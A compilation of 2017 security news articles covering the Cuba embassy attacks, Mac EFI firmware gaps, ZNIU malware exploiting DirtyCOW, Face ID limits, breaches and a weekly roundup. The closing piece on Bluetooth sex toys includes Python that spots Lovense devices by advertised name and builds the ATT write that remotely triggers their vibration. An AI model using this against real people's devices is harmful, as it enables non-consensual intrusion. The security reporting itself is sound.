
US yanks staff from Cuban embassy over sonic death ray fears

The US State Department on Friday announced that it is pulling all non-essential staff and their families out of its embassy in Cuba following reports of a secret weapon being deployed against employees there.

In a communiqué, the department said that the embassy would be reduced to an emergency skeleton staff until further notice. It will restaff the embassy only after it receives assurances from the Cuban government guaranteeing the safety of its employees.

“In conjunction with the ordered departure of our diplomatic personnel, the Department has issued a Travel Warning advising US citizens to avoid travel to Cuba and informing them of our decision to draw down our diplomatic staff,” said Secretary of State Rex Tillerson.

“We have no reports that private US citizens have been affected, but the attacks are known to have occurred in US diplomatic residences and hotels frequented by US citizens. The Department does not have definitive answers on the cause or source of the attacks and is unable to recommend a means to mitigate exposure.”

For months now, rumors have been swirling about a secret acoustic weapon being deployed against US and Canadian embassies in Cuba. Staff reported ear complaints, hearing loss, dizziness, headache, fatigue, cognitive issues, and difficulty sleeping. Twenty-one staff members based both at the embassy and at a nearby hotel have reported health issues in the past year that are believed to stem from the attacks.

The Cuban government has repeatedly denied that it has anything to do with the issue, and has asked the US to send in the FBI to investigate. So far the US has not taken them up on the offer.

In a press conference following the announcement, state department officials said that they hadn’t ruled out the possibility that a third party is carrying out the attacks. However, they insist that it is the responsibility of the Cuban government to find and stop the attackers. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/09/29/us_yanks_staff_from_cuban_embassy/

Analyzing Cybersecurity’s Fractured Educational Ecosystem

We have surprisingly little data on how to evaluate infosec job candidates’ academic qualifications. That needs to change.

Every day, a common scenario plays out across the US. An information security employer receives a resume from a recent graduate and looks at the student’s academic qualifications. Folks in human resources then invariably start muttering to themselves, “Does this individual have the necessary qualifications to be a…?” (fill in the blank: penetration tester, security operations center analyst, developer, contractor).

In an industry where hard data is respected above all else, we have surprisingly little data on how to evaluate candidate qualifications. The only issue experts seem to agree on is that there is a major infosec skills shortage — although even here, there is disagreement on exact numbers (Cyberseek cites 746,858 currently employed, but Frost &amp; Sullivan reports 1,692,000). This means that when employers look for usable guidance, rankings, or even certifications to help determine the quality of an academic program (and, by proxy, of the students and job candidates it produces), they’re out of luck.

The problem stems from the origins of security in academia. At different institutions, security-related classes emerged over the years in various disciplines, including computer science (CS), information systems (IS), and information technology (IT), as a tangent discipline in the service of broader departmental goals and curricula. In most cases, security education is still maintained within these disciplines. This program diversity makes it difficult for a single evaluation criterion to emerge that is general, yet still useful, within this diluted environment. Indeed, unlike CS, IT, and IS, there currently are no widely adopted academic accreditations for computing security at all.

Don’t Give Up  
The National Security Agency has three primary designations that institutions can apply for that will deem them as a Center of Academic Excellence (CAE). Currently, these designations are offered in three distinct areas: cyber defense (CD), cyber operations (CO), and research (R).

Nearly 170 academic institutions maintain at least one of the three National Security Agency designations listed above, but only the CAE-CD and CAE-CO maintain curricular requirements. On the surface, these designations may seem to be exactly what is needed; however, there are also some concerns with simply seeking out NSA-designated institutions. Due to the need to designate security programs that may be housed in CS, IS, IT, or dedicated computing security programs, the CAE-CD requirements are broad and primarily focused on defensive topics. As a result, these designations act more like a minimum barrier to entry in the area of infosec education and don’t provide a comparative criterion or any mapping to job functions. Moreover, they were initially created with the NSA’s goals and needs in mind, not necessarily matching those of an enterprise or more general security operation.

Indeed, this broadness, until recently, extended to the designation itself. Prior to a recent revision, the NSA CAE-CD designation was given at the institution level and not for a specific program. This meant that although institutions might have obtained this, they did not have to provide students a way to take the required courses, thereby making such a designation useless as an evaluation criterion. This highlights that just because a student attends a designated institution doesn’t mean they will receive the desired education.

The CAE-CO is a newer, more offensively focused, and also more stringent designation. However, it highlights one of the potential problems with the system as a whole. The NSA represents a unique employer, the Department of Defense, and has adapted the designation requirements to include aspects not often used or needed in industry. An example of this would be the CAE-CO requirements for Just War Theory. Most industry security professionals would agree that this is not part of their day-to-day responsibilities. None of the NSA designations focus on nongovernmental, industry requirements, particularly for roles such as penetration testing. And, without industry outreach, there doesn’t appear to be any solution on the near-term horizon.

It is important to note that accreditations alone will never totally solve this problem. Other criteria play a role in effective infosec programs. Faculty quality, extracurricular activities, and continuous communication with industry, including internships, all contribute to the overall student experience and students’ ultimate success within a program. This is where an infosec employer can find its edge: while most companies won’t be able to provide the grants and scholarships that the government does, they have the opportunity to serve as advisers to academic programs, offering feedback in exchange for mutually beneficial, hands-on internships. Using this vehicle, employers may be able to get the influence and data they need to make informed decisions about the quality of academic programs, accreditations, and, ultimately, mission-critical new hires for their teams.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Chaim Sanders is the Security Lead at ZeroFOX, which provides comprehensive social media protection for enterprises. Outside of ZeroFOX, he teaches for the computing security department at the Rochester Institute of Technology. His areas of interest include Web security, with …

Article source: https://www.darkreading.com/careers-and-people/analyzing-cybersecuritys-fractured-educational-ecosystem/a/d-id/1329980?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Apple Mac Models Vulnerable to Targeted Attacks

Several updated Mac models don’t receive EFI security fixes, putting machines at risk for targeted cyberattacks.

A systemic problem in several popular Apple Mac computer models is leaving machines vulnerable to stealthy and targeted cyberattacks.

Researchers at Duo Security analyzed 73,000 real-world Mac systems from users across industries, spanning three years of OS updates. They found many don’t receive Extensible Firmware Interface (EFI) security fixes when they upgrade to the latest OS or download security updates, exposing them to threats like Thunderstrike 2 and the firmware attacks detailed in the Vault 7 data dump.

Attacks on the EFI layer, which boots and manages functions for hardware systems, are especially threatening because they give attackers a high level of privilege on target systems.

“At that layer, [attacks] can influence anything on the layers above,” says Rich Smith, director of R&amp;D at Duo. “You can really circumvent any security controls that may be in place … it’s ultimate power in terms of raw access to what the computer has to offer.”

“For the longest time, Apple didn’t do a lot to keep [EFI firmware] up-to-date, and it was very manual,” explains R&amp;D engineer Pepijn Bruienne. After Thunderstrike 1 was published in 2015, Apple recognized the danger and simplified its update process by deploying EFI fixes with OS upgrades.

The problem is, a significant number of machines do not receive EFI security updates when they upgrade their operating systems, meaning software is secure but firmware is exposed.

What’s the damage?

Researchers found major discrepancies between the versions of EFI running on analyzed systems, and the versions they should have been running.

Although overall only 4.2% of the Macs Duo analyzed are running an EFI firmware version different from the one they ought to have (based on their hardware, OS version, and the associated EFI update), certain models are faring worse than others.

At least sixteen Mac models running a supported Apple OS have never received any EFI firmware updates. The worst affected is the 21.5″ iMac released in late 2015: researchers found 43% of the systems they analyzed were running the wrong EFI version.

Users running a version of macOS/OS X older than the latest major release (High Sierra) likely have EFI firmware that has not received the latest fixes for EFI problems. Forty-seven Mac models capable of running OS versions 10.12, 10.11, and 10.10 did not have an EFI firmware patch for the Thunderstrike 1 vulnerability. Thirty-one models capable of running the same versions didn’t have a patch for the remote variant, Thunderstrike 2. Two recent Apple security updates (2017-001 for OS X 10.10 and 10.11) shipped with the wrong firmware.

“While we can see the discrepancies and see what is happening, we can’t necessarily see why it is happening,” says Bruienne. Researchers say there is something interfering with the way bundled EFI updates are installed, which is why some systems are running older EFI versions.
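The discrepancy analysis Duo describes boils down to comparing the EFI version each machine reports against the version expected for its model and OS combination. A minimal sketch of that kind of fleet audit follows; the model names and firmware version strings are invented placeholders, not Duo’s actual data:

```python
# Expected EFI version per (model, OS version) pair. These entries are
# invented placeholders; a real audit would use Apple's published mappings.
EXPECTED_EFI = {
    ("iMac16,1", "10.12.6"): "IM161.0207.B00",
    ("MacBookPro13,2", "10.12.6"): "MBP132.0226.B25",
}

def efi_discrepancy_rate(fleet):
    """fleet: iterable of (model, os_version, reported_efi) tuples.
    Returns the fraction of known machines running an unexpected EFI."""
    checked = [m for m in fleet if (m[0], m[1]) in EXPECTED_EFI]
    stale = [m for m in checked if m[2] != EXPECTED_EFI[(m[0], m[1])]]
    return len(stale) / len(checked) if checked else 0.0
```

Machines whose model/OS pair isn’t in the table are skipped, which mirrors why such audits can only report on hardware they have reference data for.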

Danger to the enterprise

Firmware sits below the operating system, application code, and hypervisors. Low-level attacks targeting firmware put attackers at an advantage, Smith explains.

Each EFI vulnerability is unique, so details vary, but in general they are exploited through physical local access to a machine: plugging a specially crafted device into a port that uses DMA, such as a Thunderbolt or FireWire connection. These are frequently called “evil maid” attacks; the exception is Thunderstrike 2, which was purely software-based.

“Attacking EFI can be considered a sophisticated attack that would be used by nation-states or industrial espionage threat actors, and not something we expect to be used indiscriminately,” says Smith.

These attacks are difficult to detect and tougher to remediate; even wiping the hard drive would not completely eliminate malware once it’s installed, says Smith. “From an attacker’s perspective it’s very stealthy,” he notes. “It’s very difficult to remove a compromise on a system.”

While the implications are “quite severe” in terms of compromised EFI, those who should be most aware of this are people working in higher-security environments. Tech companies, governments, and hacktivists, for example, are at risk of being targeted.

Fixing the problem

Smith advises businesses to check that they are running the latest version of EFI for their systems; Duo released a tool today for conducting these checks. If possible, update to the latest version of the OS, 10.12.6, which will deliver the latest versions of Apple’s EFI firmware and patch known software security problems.

If you cannot update to 10.12.6 for compatibility reasons or because your hardware cannot run it, you may not be able to run up-to-date EFI firmware. Check Duo’s research for a list of hardware that hasn’t received an EFI update.

Given EFI attacks are mostly used by advanced actors, consider whether your business includes this level of sophisticated adversary in your threat model. If these attacks are something you proactively secure against, think about how a system with compromised EFI could affect your environment, and how you could confirm the integrity of your Macs’ EFI firmware.

“In many situations, answers to those questions would be ‘badly’ and ‘we probably wouldn’t be able to,'” says Smith. In these cases, he suggests replacing Macs that cannot update their EFI firmware, or moving them into roles where they are not exposed. These would involve physically secure environments with controlled network access.

Duo informed Apple of their data in June and Smith says interactions with the company have been “very positive.” Apple has taken steps forward with the release of macOS 10.13 (High Sierra).


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/apple-mac-models-vulnerable-to-targeted-attacks/d/d-id/1330015?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Whole Foods Reports Credit Card Breach

The breach affects customers of certain Whole Foods taprooms and table-service restaurants.

Whole Foods is investigating a payment card breach after learning an unauthorized actor accessed payment card information used at taprooms and table-service restaurants, the company reports.

Shoppers who limit their Whole Foods purchases to groceries are likely not affected; taprooms and restaurants use a different point-of-sale system than primary stores. While most Whole Foods Market stores do not have these venues, the company advises customers to closely monitor their card statements and report unauthorized charges to the issuing bank.

Amazon.com transactions have not been affected as its systems don’t connect to those at Whole Foods. Earlier this year, Amazon bought the grocery chain for $13.7 billion.

Whole Foods has contacted law enforcement and is working with a cybersecurity forensics firm in an ongoing investigation.

Access the full notification here.  

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/attacks-breaches/whole-foods-reports-credit-card-breach/d/d-id/1330016?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Apple Shares More Data with US in First Half of 2017

Device-based data requests from government agencies dropped in the first half over last year, but Apple fulfilled a higher percentage of those requests, according to its transparency report.

Apple received 4,479 requests during the first half of 2017 for device-based data, such as which of its customers were tied to which devices, and provided the information 80% of the time when US government agencies made the request, according to the company’s transparency report released this week.

While the number of requests fell from 4,822 during the same period last year, the percentage of fulfilled requests rose from 78%, according to Apple’s 2016 transparency report.

Meanwhile, US account-based requests, which generally involve cases where law enforcement agencies want information about the fraudulent use of Apple accounts, rose to 1,692 during the first half of the year, up from 1,363 last year, the 2017 and 2016 reports state. In both periods, however, the percentage of requests fulfilled held steady at 84%.

In the US, Apple fulfilled a higher percentage of device-based and account-based data requests in the first half of this year than it did worldwide, according to the 2017 report. On a global basis, 77% of device-based data requests and 80% of account-based data requests were fulfilled.

Read more about Apple’s 2017 first half transparency report here.

 


Article source: https://www.darkreading.com/cloud/apple-shares-more-data-with-us-in-first-half-of-2017/d/d-id/1330017?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Best and Worst Security Functions to Outsource

Which security functions are best handled by third parties, and which should be kept in-house? Experts weigh in.

(Image: 3D_creation via Shutterstock)


Security teams need more advanced people than they can find or afford. For many, outsourcing has become key to bridging the skills gap and addressing tasks they lack budget or talent to do.

Dark Reading’s report “Surviving the IT Security Skills Shortage” found 45% of businesses don’t outsource any of their security functions. Nearly 30% outsource a few hard-to-find skills and services, and 22% outsource some security functions while relying on third-party service providers for others. Six percent outsource most of their security tasks to third parties.

It’s possible to outsource just about any security function, says IP Architects president John Pironti, but just because you can outsource doesn’t mean you should. The question, he says, is where do you want your team to focus its time and attention?

“You have to calibrate expectations of what a third party will provide,” he explains. “They will not have the same interest or passion in your world as you will.”

Some security functions are best left in-house, Pironti adds, because they require intimate knowledge of business infrastructure and processes. Organizations will continue to master this balance as security threats evolve and multiply.

Outsourcing is more involved than simply passing off responsibilities to other people, adds Ryan LaSalle, global managing director for growth and strategy at Accenture. You have to work with providers to manage the functions you’re outsourcing and how they’re being performed.

No matter which functions you outsource, it’s critical to define expectations and processes for your partner firm, says Pat Patterson, VP of enterprise security solutions at Optiv. Most of the time, companies end up disappointed because they didn’t communicate what they needed.

“The better you as a customer can define expectations and requirements, the more prepared you will be to leverage that relationship,” he explains.

Which functions to outsource, and which to handle in-house? Read on to see the experts’ list of the most common and beneficial security functions to outsource, as well as the tasks that should be kept in-house.

(Which functions do you outsource, or which are you considering outsourcing? Let’s keep the conversation going in the comments.)  


 


Article source: https://www.darkreading.com/risk/best-and-worst-security-functions-to-outsource/d/d-id/1329995?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

iPhone X Face ID baffled by kids, twins, siblings, doppelgängers

Youngsters! Pfft. They all look alike!

No, really, they do if you’re the Face ID facial recognition system in Apple’s iPhone X. Specifically, twins, siblings and look-alikes can trigger false matches. Growing kids, with their morphing faces, also baffle the biometric authentication.

Apple said so in a guide (PDF) about Face ID security that it published on Wednesday.

Overall, Face ID is pretty resistant to letting the wrong person log into your phone, Apple said. The possibility of a random person being able to unlock your phone by looking at it is about 1 in 1 million. Not bad, particularly when you compare it with Touch ID, which can be fooled approximately 1 in 50,000 times, Apple says.
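Those headline figures are per-attempt odds, and over repeated attempts they compound. A quick back-of-the-envelope comparison (the rates are Apple’s published figures; the attempt count is an arbitrary illustration):

```python
def p_any_false_match(per_attempt_rate, attempts):
    """Chance that at least one of `attempts` independent tries
    produces a false match, given a per-attempt false-match rate."""
    return 1.0 - (1.0 - per_attempt_rate) ** attempts

FACE_ID = 1 / 1_000_000   # Apple's figure for Face ID
TOUCH_ID = 1 / 50_000     # Apple's figure for Touch ID

# Over the same number of tries, Touch ID's cumulative false-match
# odds grow roughly twenty times faster than Face ID's.
face = p_any_false_match(FACE_ID, 10_000)
touch = p_any_false_match(TOUCH_ID, 10_000)
```

The 20x gap between the two per-attempt rates carries straight through to the cumulative odds for any realistic number of attempts.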

But the odds go out the window once you throw in twins, siblings, pre-teens and evil doppelgängers. From Apple’s security guide:

The probability of a false match is different for twins and siblings that look like you as well as among children under the age of 13, because their distinct facial features may not have fully developed. If you’re concerned about this, we recommend using a passcode to authenticate.

Of course, you don’t have to use Face ID instead of a passcode. And as we noted recently when covering how features in the new iOS 11 will perhaps create fresh headaches for law enforcement, there are reasons why you might prefer to have your phone set up to require a passcode over a biometric sign-on.

Namely, the history of court decisions in the US has tended to lean toward granting Fifth Amendment protection against forcing people to give up their passcodes, given that a passcode is something you know, and the Fifth Amendment protects people from testifying against themselves.

Similar thinking has meant that biometrics, including Touch ID, involve something you are, not something you know, making it kosher, as far as the courts are concerned, to force unlocking with finger swipes. (N.B. There are court decisions and court actions that haven’t synced up with those interpretations, including that of the ex-cop who is suspected of child abuse image trafficking, won’t or can’t give up his passcodes, and is being jailed indefinitely until he does.)

At any rate, even if you do opt to use Face ID – granted, it can be a time-saver if your passcode is as pleasingly plump and considerably complex as it really should be – there are plenty of times when you still have to use a passcode to authenticate on the iPhone X. In its attempt to clarify questions about the security around iPhone X, Apple says you’re required to use a passcode when…

  • The device has just been turned on or restarted.
  • The device hasn’t been unlocked for more than 48 hours.
  • The passcode hasn’t been used to unlock the device in the last 156 hours (six and a half days) and Face ID has not unlocked the device in the last 4 hours.
  • The device has received a remote lock command.
  • After five unsuccessful attempts to match a face.
  • After initiating power off/Emergency SOS by pressing and holding either volume button and the side button simultaneously for 2 seconds.
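Read as a checklist, the rules above amount to a single predicate. The sketch below is illustrative only; the parameter names are invented, and Apple’s actual logic is internal to iOS:

```python
def passcode_required(just_restarted, hours_since_unlock,
                      hours_since_passcode_use, hours_since_face_id,
                      remote_lock_received, failed_face_matches,
                      sos_initiated):
    """Approximate Apple's published conditions for when the
    iPhone X falls back from Face ID to the passcode."""
    return bool(
        just_restarted
        or remote_lock_received
        or sos_initiated
        or failed_face_matches >= 5
        or hours_since_unlock > 48
        # 156 hours without the passcode AND 4 hours without a
        # Face ID unlock together force the passcode.
        or (hours_since_passcode_use > 156 and hours_since_face_id > 4)
    )
```

Note that the 156-hour and 4-hour conditions only trigger jointly, while every other condition forces the passcode on its own.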

That’s a list worth paying attention to. Given the soaring rate of forced warrantless device searches at the US border, it’s good to know how to quickly turn off Face ID (though do bear in mind that US Customs and Border Protection officers may not take kindly to a lack of cooperation).

According to Gadget Hack, which says it gets its info from Craig Federighi, Apple’s senior vice president of software engineering, to disable Face ID in a pinch, just grip the buttons on both sides of an iPhone X when handing it over to another person:

Since a screenshot uses the side button and volume up together, we can assume he means you’d need to press all three buttons – side, volume up, and volume down – simultaneously. We’re not sure how long they would have to be pressed, but it should not take very long since speed is necessary when handing your device over.

On all other iPhone models in iOS 11, press the power button 5 times in a row to activate Emergency SOS, which will quickly disable Touch ID until a passcode is entered.

At any rate, one of the major questions asked about iPhone X Face ID hasn’t been about kids or siblings, per se; rather, it’s about facial recognition algorithms trained, largely by white developers, on mostly white faces. Such algorithms have been found to be less accurate at identifying black faces.

According to its security guide, Apple has taken that into account. The company says that its facial recognition neural networks have been trained with over a billion images, representing people from around the world across genders, ages, ethnicities, and other factors. The networks have also been designed to work with hats, scarves, glasses, contact lenses, and many sunglasses, whether the face is indoors or outdoors, or even in complete darkness.

Apple says that it’s also devoted an additional neural network that’s specifically been trained to spot and resist spoofing attacks via photos or masks.

Those who are nervous about the privacy of their facial biometrics will be glad to hear that face data won’t be leaving the iPhone X. It won’t be backed up by iCloud, for instance, which is good to hear, given how Apple’s online backup is targeted by so many creeps who phish passcodes in an attempt to get at intimate material in iCloud.

From the security guide:

Face ID data doesn’t leave your device, and is never backed up to iCloud or anywhere else. Only in the case that you wish to provide Face ID diagnostic data to AppleCare for support will this information be transferred from your device.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/O5dfPup3ZUY/

Android malware ZNIU exploits DirtyCOW vulnerability

Thanks to Jagadeesh Chandraiah of SophosLabs for his behind-the-scenes work on this article.

Last year, we told you about DirtyCOW, a privilege escalation bug in the Linux kernel that allows ordinary users to turn themselves into all-powerful root users. It soon became clear that DirtyCOW didn’t just affect Linux running on Intel processors but was also exploitable on Android (a modified version of Linux) running on ARM chips too.

This raised the possibility of DirtyCOW being used to compromise phones and tablets.

SophosLabs has now found malware, dubbed ZNIU, that does exactly that.

Enter ZNIU

Victims have to stray beyond the safety of the Google Play walled garden to get ZNIU, so attackers trick them into downloading infected apps from untrusted sources with old-fashioned social engineering. This example of ZNIU comes packaged as a porn app:

ZNIU

After being installed, the app exploits DirtyCOW to elevate its privileges, bypassing the restrictions that would normally stand in its way. Once it infects a device, ZNIU contacts its command-and-control servers to receive updates and orders. The servers are consulted whenever the infected device is connected to a power outlet or there’s a change in connectivity.

Malicious code contained in APKs (Android Application Packages) is downloaded from remote servers and executed at runtime in the hope of avoiding early detection from malware scanners.

ZNIU also creates a backdoor that can be used for future remote-controlled attacks and has the ability to send SMS messages, which opens the door for money making schemes such as sending spam, phishing or messaging premium rate numbers owned by the attacker.

The malware also collects device data:

ZNIU collecting device details

The DirtyCOW vulnerability

By successfully exploiting the DirtyCOW bug (known officially as CVE-2016-5195), ZNIU is able to grant itself all the permissions it needs to do harm without having to ask the user, or trick them.

The bug is explained in the Red Hat bug database like this:

A race condition was found in the way Linux kernel’s memory subsystem handled breakage of the read only private mappings COW situation on write access.

An unprivileged local user could use this flaw to gain write access to otherwise read only memory mappings and thus increase their privileges on the system.

In other words, the Linux Copy On Write mechanism can be tricked into overwriting a read-only file, which is something of a security catastrophe if that read-only file is a critical system executable or configuration file.

For a comprehensive explanation of DirtyCOW, check out Paul Ducklin’s excellent article – Linux kernel bug: DirtyCOW “easyroot” hole and what you need to know.

What to do

The good news is that ZNIU isn’t available on Google Play and only works on devices running older versions of Android that aren’t patched against DirtyCOW. 

Google released a patch for Android way back in December but, sadly, the Android ecosystem is badly fragmented and whether or not you get updates is up to your vendor, not Google. Different vendors will release patches at different times and some may not release them at all.

So just because there’s a patch for DirtyCOW, that doesn’t mean you’ve got it. What we can say for sure is that users of the latest version of the Android operating system, Oreo, have nothing to worry about and that Sophos Mobile customers are protected (Sophos detects ZNIU as Andr/Rootnik-AI and Andr/ZNIU-A.)

If you’re concerned about your device, please contact your vendor.
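As a rough self-check before contacting your vendor, you can compare the kernel release string against the first mainline point releases that carried the CVE-2016-5195 fix. This is only an illustrative heuristic: distro kernels backport patches, so version numbers alone prove nothing, and the table below holds just a couple of example series; always verify against your vendor’s advisory.

```python
import platform

# First mainline point release in each series known to carry the
# CVE-2016-5195 fix. Example entries only; check your distro's advisory.
FIXED_IN = {(4, 4): 26, (4, 8): 3}

def maybe_unpatched(release=None):
    """Heuristic: True if this kernel release *might* predate the fix."""
    release = release or platform.release()        # e.g. '4.4.21-generic'
    parts = (release.split("-")[0].split(".") + ["0", "0"])[:3]
    major, minor, patch = (int(p) for p in parts)
    fixed = FIXED_IN.get((major, minor))
    if fixed is None:
        # Series not in the table: 4.9 and later shipped fixed;
        # anything older is treated as suspect.
        return (major, minor) < (4, 9)
    return patch < fixed
```

A `True` result is a prompt to go ask your vendor, not a diagnosis; a backported fix will produce a false positive here.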

Another tale of patches unapplied

History is littered with cases where attacks and outbreaks have happened because patches were available but weren’t applied. There’s no better example in recent history than the WannaCry outbreak in May 2017. At the time, we noted that its spread was made possible in part by the unheeded lessons of the past, such as Slammer and Conficker.

The DirtyCOW hole was plugged a year ago so please make sure you have the latest security updates on your phone or tablet.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/jagbJ6cavWg/

Citrix patches Netscaler hole, ARM TrustZone twisted, Android Dirty COW exploited – and more security fails

Roundup As ever, it has been a busy week on the security front with good news, some very bad reports, corporate failings all round and troubling signs ahead for those worried about government intrusion in the online world.

Here’s El Reg‘s take on the resulting wreckage.

Cloudflare opens up protection

Among the good news: Cloudflare says it will be giving all customers “Unmetered Mitigation” against DDoS attacks, meaning anyone who subscribes will now get the full protection afforded by the edge network provider, rather than having to pay based on the volume of protected traffic.

Cloudflare CEO Matthew Prince reasons it’s wrong of his firm to charge users based on the size of the person attacking them, or let them get knocked offline because they can’t afford to guard against huge volumes.

“DDoS attacks are, quite simply, a plague on the Internet and it’s wrong to surprise customers with higher bills when they are targeted by one,” Prince said.

“With Unmetered Mitigation, we’re breaking the industry’s practice of surge pricing when someone comes under attack. It was an easy decision for us because it’s the right thing to do.”

Malware mutterings

In malware news, Trend Micro spotted the first Android malware sample that tries to exploit the Dirty COW Linux kernel vulnerability, which Google patched in Android last December. The ZNIU malware turned up installed in over 300,000 apps that were spammed out to stores around the world.

In all, around 5,000 unlucky and unpatched Android users got a taste of ZNIU, but it was Chinese users who suffered most. The malware cost them dearly by sending out premium-rate SMS messages and deleting any evidence that it was doing so.

Google is trying to use machine learning to spot such malware before it becomes an issue. At the Structure Security conference in San Francisco on Tuesday, the company’s head of Android security Adrian Ludwig reported considerable success, with the Chocolate Factory claiming its AI systems spotted just five per cent of malware samples at the start of the year, compared to 55 per cent now.

It wasn’t just threats to Android that surfaced this week. Cisco’s Talos Security team spotted a very nasty bit of code going after the bank accounts of Brazilian computer users – the first to be found written in Delphi.

The malware was signed with a legitimate VMware digital signature and used this to worm onto computers and then download a full suite of financial fraud tools. These stole credentials to some of Brazil’s most popular banks using fake webpages and keyloggers.

Bugs bork apps n’chips

Citrix said on Monday the Netscaler and SD-WAN issue that prompted it to halt software downloads last week was an authentication bypass in its management interface. The software maker released a patch along with remediation advice on Monday in an advisory here.

Cisco also had issues with its Umbrella Virtual Appliance Version 2.0.3 software, after an undocumented encrypted remote support tunnel (SSH) was found in the code. Cisco said that it had been put there for remote support by its staff but, as it hadn’t mentioned this in the documentation, was reporting it as a vulnerability.

“While Cisco has NO indications that our remote support SSH hubs have ever been compromised, Cisco has made significant changes to the behavior of the remote support tunnel capability to further secure the feature,” it said.

Also this week an interesting side-channel attack against ARM’s TrustZone popped up. The TrustZone is the chip firm’s supposedly secure data haven contained on its latest silicon. Side-channel attacks usually need physical access to the target device – but not this one.

Researchers subverted the energy management systems of a Nexus 6 phone and were able to read data moving in TrustZone just by measuring power output. They then injected attack code of their own. The technique also appears to be transferable to other ARM-powered systems, just to make matters worse.

However, there was good news for macOS users who have upgraded to the High Sierra operating system. The new code has an eficheck function that will check the firmware of the Extensible Firmware Interface to make sure nothing has been tampered with.

Snoopy snoopy sneak sneak

Police use of fake mobile phone masts dubbed “Stingrays” might be slightly better regulated in the future thanks to a court ruling on Thursday. An appeals court in Washington ruled that their use requires a warrant – something the police have fought vociferously against.

Law enforcement in the US has spent over $100m on such devices and while states and politicians are trying to limit Stingray, governments show no sign of backing down. The case will probably now go to the Supremes.

Meanwhile, the American Civil Liberties Union is fighting a data-harvesting request from the Department of Justice into who isn’t keen on President Trump. The DoJ wants the names of 6,000 people who signed up to an anti-Trump website before the inauguration.

A gag order prevented Facebook discussing the case, but The Social Network™ fought and won. The case is ongoing, but based on past experience the government may have been overreaching itself again.

Storefront fails

Amazon’s efforts to remake grocery chain Whole Paycheck Foods encountered a setback when malware was discovered on some of its point-of-sale terminals.

Thankfully the damage was limited to the in-store restaurants and taprooms (pubs) in Whole Foods, which don’t share terminals with the main grocery system. So far there’s no word on how many customers have been affected.

Not so at Sonic, the US purveyor of fast food. Earlier in the week security blogger Brian Krebs discovered a cache of five million credit cards offered for sale online. They turned out to be sourced from customers of the burger slinger’s eateries.

The company has confirmed that an attack on its POS terminals was successful but didn’t say how many people were affected. Given the chain has over 3,500 outlets, it’s perfectly possible that the entire archive came from its customers.

And finally, secure messaging app Telegram’s CEO has said Russia’s spies demanded the decryption keys for his messaging app, and Apple has published [PDF] its latest surveillance transparency report: yup, governments are still demanding data on some fanbois. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/09/29/weekly_security_roundup/

Dildon’ts of Bluetooth: Pen test boffins sniff out Berlin’s smart butt plugs

Security researchers have figured out how to locate and exploit smart adult toys.

Various shenanigans are possible because of the easy discoverability and exploitability of internet-connected butt plugs and the like running Bluetooth’s baby brother, Bluetooth Low Energy (BLE), a wireless personal area network technology. The tech has support for security but it’s rarely implemented in practice, as El Reg has noted before.

The shortcoming allowed boffins at Pen Test Partners to hunt for Bluetooth adult toys, a practice it dubbed screwdriving, in research that builds on its investigation into Wi-Fi camera dildo hacking earlier this year.

BLE devices also advertise themselves for discovery. The Lovense Hush, an IoT-enabled butt plug, calls itself LVS-Z001. Other Hush devices use the same identifier.

The Hush, like every other sex toy tested by PTP (the Kiiroo Fleshlight, Lelo, Lovense Nora and Max), lacked adequate PIN or password protection. Where a device did have a PIN it was a generic one (0000, 1234, etc). This omission is for understandable reasons. PTP explains: “The challenge is the lack of a UI to enter a classic Bluetooth pairing PIN. Where do you put a UI on a butt plug, after all?”

The only protection is that BLE devices will generally only pair with one device at a time and their range is limited.

By walking down a regular Berlin street with a Bluetooth sniffer, a PTP researcher was able to discover a number of Lovense sex toys, identifiable by their advertised names, through passive reconnaissance.
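That passive reconnaissance relies on nothing more exotic than reading the advertisement payloads every BLE device broadcasts, which carry the device name in a standard length/type/value structure. A minimal sketch of the name-spotting step (the AD-structure layout is per the Bluetooth spec; the sample packet below is fabricated for illustration):

```python
from typing import Optional

HUSH_NAME = b"LVS-Z001"   # local name the Lovense Hush advertises
COMPLETE_LOCAL_NAME = 0x09  # BLE AD type for "Complete Local Name"

def extract_local_name(adv_data: bytes) -> Optional[bytes]:
    """Walk the length/type/value AD structures in a raw BLE
    advertisement payload and return the Complete Local Name, if any."""
    i = 0
    while i < len(adv_data):
        length = adv_data[i]
        if length == 0:
            break
        ad_type = adv_data[i + 1]
        if ad_type == COMPLETE_LOCAL_NAME:
            return bytes(adv_data[i + 2 : i + 1 + length])
        i += 1 + length
    return None

# A captured advertisement carrying a flags field plus the name "LVS-Z001":
payload = bytes([2, 0x01, 0x06, 9, 0x09]) + HUSH_NAME
print(extract_local_name(payload) == HUSH_NAME)  # True
```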

Mischievous hackers could easily go one step further and turn on the device using commands derived from an examination of the kit.

The associated app causes the Hush to start vibrating when the handle 0x000e has “Vibrate:5” written to it.

A hacker “could drive the Hush’s motor to full speed, and as long as the attacker remains connected over BLE and not the victim, there is no way they can stop the vibrations.” Ooh err missus.
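On the wire, that write is just an unauthenticated ATT Write Request to the handle mentioned above. A sketch of the raw packet an attacker’s stack would emit (the opcode and PDU layout follow the Bluetooth Core spec; the helper function is ours):

```python
ATT_WRITE_REQ = 0x12  # ATT Write Request opcode

def att_write_request(handle: int, value: bytes) -> bytes:
    """Build a raw ATT Write Request PDU: one opcode byte, the 16-bit
    attribute handle (little-endian), then the value to write."""
    return bytes([ATT_WRITE_REQ]) + handle.to_bytes(2, "little") + value

# The packet that writes "Vibrate:5" to handle 0x000e:
pdu = att_write_request(0x000E, b"Vibrate:5")
print(pdu.hex())  # 120e00566962726174653a35
```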

